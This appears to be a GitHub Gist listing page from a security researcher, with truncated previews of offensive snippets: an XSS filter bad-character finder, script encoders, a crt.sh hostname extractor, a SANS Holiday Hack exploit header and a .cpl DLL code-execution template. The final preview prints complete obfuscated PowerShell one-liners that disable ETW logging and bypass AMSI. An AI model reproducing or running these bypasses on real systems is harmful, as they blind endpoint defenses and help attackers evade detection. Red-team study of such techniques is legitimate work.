@reigningshells
reigningshells / badchars.py
Created May 24, 2019
Simple script to identify an XSS filter's "bad characters"
#!/usr/bin/env python
"""
Very simple script to automate the discovery of
bad characters in XSS filters that replace
the entire user input string with an empty string
[CR] = Carriage Return or \r
[LF] = Line Feed or \n
@reigningshells
reigningshells / script-encoder.ps1
Last active Jan 30, 2020
Just some script encoding musings
Function Encode-Script
{
Param(
[Parameter(Position = 0, Mandatory = $True)]
[String]
$Data,
[Parameter(Position = 1, Mandatory = $True)]
[String]
$Key
reigningshells / cryptedkerb.ps1
function Expand-Script($Key)
{
$script = '
@reigningshells
reigningshells / cert-transparency-extractor.py
Last active Jul 20, 2020
Simple script to extract hostnames from cert transparency logs at crt.sh
#!/usr/bin/env python3
import sys
import argparse
import requests
from lxml import html
import urllib3
# Nobody wants to see SSL warnings :-P
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
@reigningshells
reigningshells / HH2020-tag-generator-pseudo-shell.py
Created Jan 23, 2021
SANS Holiday Hack 2020 Broken Tag Generator Exploit - Solution for Objective 8
#!/usr/bin/env python3
import sys
import argparse
import string
import random
import requests
import urllib3
import base64
import readline
@reigningshells
reigningshells / Cplapplet.cpp
Created Mar 7, 2021
DllMain template to execute code from a .cpl file, which is just a renamed DLL that exports a function named CplApplet
// dllmain.cpp : Defines the entry point for the DLL application.
#include "pch.h"
#include <Windows.h>
extern "C" __declspec(dllexport) LONG CplApplet()
{
MessageBoxA(NULL, "Replace this message box with something more interesting...", "Control Panel", 0);
return 1;
}
@reigningshells
reigningshells / powershell-bypasses.ps1
Last active Jun 11, 2021
Random PowerShell Bypasses
# Logging bypass:
(({}).gettype())."aSs`emblY"."Getty`PE"(('System.Manage'+'ment.Automati'+'on.Trac'+'ing.P'+'SEtwL'+'og'+'Pro'+'vi'+'d'+'e'+'r'))."gEtf`ieLD"(('etwProvi'+'de'+'r'),('Non'+'P'+'ublic,Static'))."Se`TVAL`Ue"($null,(New-Object System.Diagnostics.Eventing.EventProvider(New-Guid)))
# AMSI Bypass (old, burned)
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
# New AMSI bypass obfuscation: